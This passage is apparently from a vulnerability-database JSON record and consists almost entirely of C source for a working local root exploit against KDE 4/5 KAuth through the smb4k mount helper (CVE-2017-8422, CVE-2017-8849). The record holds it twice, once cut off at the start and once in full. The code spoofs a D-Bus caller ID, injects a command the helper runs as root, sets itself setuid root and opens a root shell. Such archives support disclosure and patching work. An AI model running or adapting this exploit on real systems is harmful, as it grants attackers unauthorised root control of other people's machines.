...\\n\");\r\n\tunlink(boomsh);\r\n\tif ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)\r\n\t\tdie(\"[-] open\");\r\n\twrite(fd, \"#!/bin/sh\\n\", 10);\r\n\twrite(fd, me, strlen(me));\r\n\twrite(fd, \"\\n\", 1);\r\n\tclose(fd);\r\n\r\n\tprintf(\"[*] Triggering call...\\n\");\r\n\r\n\tif (fork() == 0) {\r\n\t\texecve(*dbus, dbus, NULL);\r\n\t\texit(1);\r\n\t}\r\n\twait(NULL);\r\n\tsleep(5);\r\n\tprintf(\"[*] Trying to find rootshell...\\n\");\r\n\r\n\tmemset(&st, 0, sizeof(st));\r\n\tstat(me, &st);\r\n\tif ((st.st_mode & 04000) != 04000)\r\n\t\tdie(\"[-] Failed to chmod ourselfs.\\n\");\r\n\r\n\texecve(me, sh, NULL);\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42053/"}], "packetstorm": [{"lastseen": "2017-05-25T17:56:17", "description": "", "published": "2017-05-23T00:00:00", "type": "packetstorm", "title": "KDE 4/5 KAuth Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "id": "PACKETSTORM:142638", "href": "https://packetstormsecurity.com/files/142638/KDE-4-5-KAuth-Privilege-Escalation.html", "sourceData": "`// cc -Wall smb0k.c -pedantic -std=c11 \n// \n// smb4k PoC, also demonstrating broader scope of a generic kde \n// authentication bypass vulnerability \n// \n// (C) 2017 Sebastian Krahmer \n// \n \n#define _POSIX_C_SOURCE 200112L \n#include <stdio.h> \n#include <fcntl.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <errno.h> \n#include <string.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/stat.h> \n \n \nvoid die(const char *s) \n{ \nperror(s); \nexit(errno); \n} \n \n \nint main(int argc, char **argv) \n{ \nchar me[1024] = {0}; \nchar *dbus[] = { \n\"/usr/bin/dbus-send\", \n\"--system\", \n\"--print-reply\", \n\"--dest=net.sourceforge.smb4k.mounthelper\", \n\"/\", \n\"org.kde.auth.performActions\", \n\"array:byte:\" \n// The variant map, containing evil mh_command key-pair \n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\" \n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\" \n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\" \n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\" \n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\" \n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\" \n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\" \n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\" \n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\" \n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\" \n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\" \n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\" \n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\" \n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\" \n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\" \n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\" \n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\" \n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\" \n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\" \n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\" \n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\" \n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\" \n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\" \n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\" \n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\" \n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\" \n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\" \n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\" \n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\" \n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\" \n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\" \n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\" \n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\" \n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\" \n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\" \n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\" \n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\" \n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\", \n \n// the callerID, \":1.0\" which is dbus itself and thus always passes \n\"array:byte:58,49,46,48\", NULL}; \n \nchar *boomsh = \"/tmp/xmount.cifs\"; \nchar *const sh[] = {me, \"shell\", NULL}; \nchar *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL}; \nstruct stat st; \nint fd = -1; \n \nif (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0) \ndie(\"[-] readlink\"); \n \nif (geteuid() == 0) { \nsetuid(0); \nsetgid(0); \nif (argc == 2) { \nexecve(*bash, bash, NULL); \ndie(\"[-] execve of bash\"); \n} \nchown(me, 0, 0); \nchmod(me, 04755); \nexit(0); \n} \n \nprintf(\"[*] Creating shellscript ...\\n\"); \nunlink(boomsh); \nif ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0) \ndie(\"[-] open\"); \nwrite(fd, \"#!/bin/sh\\n\", 10); \nwrite(fd, me, strlen(me)); \nwrite(fd, \"\\n\", 1); \nclose(fd); \n \nprintf(\"[*] Triggering call...\\n\"); \n \nif (fork() == 0) { \nexecve(*dbus, dbus, NULL); \nexit(1); \n} \nwait(NULL); \nsleep(5); \nprintf(\"[*] Trying to find rootshell...\\n\"); \n \nmemset(&st, 0, sizeof(st)); \nstat(me, &st); \nif ((st.st_mode & 04000) != 04000) \ndie(\"[-] Failed to chmod ourselfs.\\n\"); \n \nexecve(me, sh, NULL); \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142638/kde45-escalate.txt"}]}